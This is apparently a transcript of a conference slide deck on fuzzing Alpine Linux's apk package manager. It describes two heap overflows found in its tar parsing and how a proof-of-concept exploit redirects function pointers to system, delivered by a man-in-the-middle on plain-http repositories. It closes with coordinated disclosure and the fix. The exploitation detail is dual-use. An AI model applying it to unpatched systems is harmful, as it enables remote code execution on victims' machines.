Exploiting Alpine Linux From Vulnerability to Code Execution

From vulnerability discovery to code execution Exploiting Alpine Linux By
Ariel Zelivansky, Security Researcher

What is Alpine Linux? • Lightweight Linux distribution • Alpine’s
motto: Small, simple and secure • Alpine docker image only 5 MB in size • Security in mind ◦ The kernel is patched with a port of grsecurity/PaX ◦ Userspace binaries compiled as PIE, NX enabled, full RELRO, with stack smashing protection

Who uses Alpine? • Alpine has become widely popular for
use with containers (10M+ pulls) • Many Docker images are now based on Alpine • Docker has officially stated their support of Alpine

Researching Alpine • What does an alpine container consist of?
◦ musl libc ◦ busybox userspace binaries ◦ apk-tools • What do people do with Alpine containers? ◦ Download more programs! ◦ apk - Alpine’s package manager

Apk • A tool to install, upgrade and delete packages
(aka a package manager) • Historically a collection of shell scripts, now written in C • To add a package - apk update and apk add [name] ◦ Or just apk add [name] -U/--update • Can I somehow alter packages or convince apk to downgrade packages?

Apk • Documentation first (Alpine’s wiki) ◦ /etc/apk/repositories - list
of local/remote repositories ◦ By default with docker image - plain http • Prone to MITM attack • Fortunately, an attack is not so simple ◦ Packages are signed ◦ See /etc/apk/keys • What about update? ◦ “A repository is simply a directory with a collection of *.apk files. The directory must include a special index file, named APKINDEX.tar.gz to be considered a repository.” ◦ Update essentially downloads and parses the APKINDEX.tar.gz file

Apk • Signature inside archive? • Sounds like fuzzing time
◦ What’s fuzzing? ◦ american fuzzy lop (afl-fuzz) ▪ Finds lots of bugs (and vulnerabilities) in open source software project) ▪ Compile with afl-gcc to instrument file

Apk • Clone apk-tools from alpine’s git repository • Empty
README • Relevant code seems likely to be in update.c • main is in apk.c • After inspecting the code for a while, it appears each action is defined as an applet

Apk • Update.c doesn't seem to do anything ◦ Actual
code in database.c looks for APK_UPDATE_CACHE flag ◦ After briefly learning the code, I was ready to fuzz it • Writing my own applet ◦ Read data from file (fuzzer will provide) ◦ Call apk_bstream_from_file to read the file ◦ Call apk_db_index_read with the data ◦ Define applet, add to Makefile • Running afl inside docker container ◦ Easy to setup and reproduce

Fuzzing Apk • Fuzzer does nothing • Tried fuzzing different
other functions, tweaked the code to allow fuzzing • Finally, decided on fuzzing apk_tar_parse ◦ Looks promising

Fuzzing Apk • Fuzzing very slow to my experience •
Diving into the code again ◦ Removed anything that might slow down the fuzzer and I don’t need ◦ init_openssl ◦ apk_db_init / apk_db_open • Fuzz time

Fuzzing Apk • Multiple crashes • Triaging crashes with crashwalk
◦ Runs through all crashes and identify the crash type ◦ Suggests if exploitable ◦ My final summary results in 6 different crashes

Reproducing the crash • So far I was only able
to reach the crashes in my modified code • To reproduce with the real apk, I used a crash as a bad tar.gz file ◦ cat crash | gzip -9 > ~/docker/files/alpine/v3.6/main/x86_64/APKINDEX.tar.gz ◦ Served the file from my local server ◦ docker run -ti --add-host dl-cdn.alpinelinux.org:172.17.0.2 alpine:3.6 ◦ Upon running apk update, a segfault occurred! • After a debugging session with gdb, I determined the origin of the crash

Explaining the bugs • The result is two (similar) heap
overflow vulnerabilities • Let’s examine the relevant code (inside archive.c) • Tar consists of blocks of 512 bytes, starting with a tar header block for each file ◦ Reads tar stream in chunks, runs callback function on each chunk • One of the fields of the header is a typeflag ◦ One of its uses is to indicate special blocks, such as the “GNU long name extension” ◦ This extension indicates the following block includes the name of the file (only 100 bytes otherwise) • How is this implemented?

Explaining the bugs • Uses blob_realloc to allocate the buffer
for the name

Explaining the bugs • int is naturally signed ◦ b->len
is long, also signed ◦ The comparison is signed • Any integer bigger than the maximum of a signed integer (0x80000000) will result in the buffer unmodified

Explaining the bugs • The following call to is->read a
huge amount of bytes will be copied to the buffer ◦ AKA Heap overflow ◦ As long as is->read accepts the size as unsigned ◦ In the case of a tar.gz, is->read is gzi_read which accepts size_t (unsigned)

Explaining the bugs • So to fix, make blob_realloc accept
size_t! ◦ Yes, but also make sure entry.size is not max int (because a +1 would overflow it) • A similar bug occurred with a pax header block (another special block)

Developing an exploit • I built a minimalistic tar file
◦ To trigger the bug, I put a longname block with a negative size ◦ In tar size is an octal number in ASCII, I went with 0o77777777777 (-1 for a signed 32-bit integer)

Developing an exploit • The execution crashed as expected ◦
The crash was on the copy of a null-terminating zero meant for the entry.name buffer ◦ entry.name was not allocated, so it pointed to null ◦ entry.size was 0xffffffffffffffff (it was implicitly converted to 64-bit, it’s of type off_t)

Developing an exploit • I created another file, with two
blocks ◦ First block to allocate the buffer with a size I want ◦ Second buffer exploits the vulnerability with the allocated buffer • Debugging the execution, it seems everything goes as expected ◦ The buffer is allocated then overwritten ◦ The code works to my advantage - is->read is gzip_read ▪ gzip_read copies chunks from the source stream to the target and stop once the source runs out! ▪ No need to worry about the source’s size

Developing an exploit • There are various known ways to
exploit a heap overflow ◦ Remember musl libc? Memory allocation (malloc, realloc) is done by it ◦ I preferred not to research it ◦ I can workaround an exploit using the code ▪ Is there anything useful on the heap? A flag to change? Structs with callbacks? ▪ I could simply change a callback address to execv or system • Mitigations? ◦ ASLR ◦ For the sake of a proof-of-concept, ignoring ASLR

Developing an exploit • Lots of trial and error, trying
to find structs after entry.name I should overwrite • I realized I can just use the is struct, which is used on is->read • It is of type apk_istream • I put a breakpoint on the call to is->read • I calculated the delta between my buffer (entry.name) to the is struct

Developing an exploit • I filled my tar file with
0x153a0 bytes, following 16 zero bytes • It worked! ◦ The execution crashed on 0x0000000000000000 • Next step - call system with a string I control

Developing an exploit • is->read parameters? ◦ is->read(is, entry.name, entry.size);
• Since the first parameter is itself, I could overwrite the first 8 bytes of it with my shell string ◦ The first 8 bytes are of get_meta which is not called in our context ◦ I used “echo 1” as the string ◦ It worked! • New problems ◦ Shell string limit is 8 bytes, too short ◦ The next day I failed to reproduce the exploit ▪ is->read seems to write the data in chunks, so it only writes 4 bytes and calls is->read again (which is only partly modified)

Developing an exploit • How would I find what’s after
the is struct? • I recover is in the file (copy the actual addresses) • I added random bytes after it • gis->bs pointer seems like a good choice • It is of type apk_bstream

Developing an exploit • gis->bs->read is used in the same
manner as is->read • It has 8 more bytes to use for the shell string (used for flags) • I overwrote a pointer to the struct unlike is where I had overwritten the actual struct • I put my data just 32 bytes before the is struct ◦ I could put it anywhere I have control of gis->bs->flags gis->bs->get_meta gis->bs->read gis->bs->close, is->get_meta…. overwritten to system

Developing an exploit • It works!

Real attack vector • Man-in-the-middle in an organization ◦ Attacker
gets code execution on any alpine package install or update ◦ Attacker gets code execution on building alpine images ◦ Signature did not help since it’s taken from inside the tar

Final steps • I’ve found a vulnerability, what next? •
Responsible/Coordinated disclosure ◦ Estimate the impact, write a proof-of-concept if it makes sense ◦ Contact the developers ▪ Nearly always privately, you don’t want public disclosure ▪ Work on a fix ◦ Assign CVE IDs ▪ Check for the correct CNA (CVE Numbering Authority) ▪ Otherwise contact MITRE through their web form ◦ Disclose the vulnerability online ▪ For open source the oss-security mailing list is a good choice

Final steps • The bugs I found affect all apk
versions since 2.5.0_rc1 • I reached alpine’s developers on IRC ◦ Discussed the issues with Timo Teräs in private emails ◦ A patch was released very quickly and was pushed to apk-tools 2.7.2 and 2.6.9 ▪ All alpine versions from current to 3.2-stable include the fix ◦ Besides fixing the bugs, Timo also implemented additional hardenings to restrict attackers from creating a similar exploit ▪ This is done by removing the use of function pointers that are saved on structs on the heap • I sent an advisory to oss-sec and wrote about the issue in the Twistlock’s blog

Future ideas • Fuzzing other parts of apk • Fuzzing
other alpine tools • Fuzzing libfetch

Demonstration

Ariel Zelivansky [email protected] @TwistlockLabs (new!) Blog: Twistlock.com/blog Thank you!

Exploiting Alpine Linux From Vulnerability to C...

Exploiting Alpine Linux From Vulnerability to Code Execution

More Decks by Twistlock

Other Decks in Technology

Featured

Transcript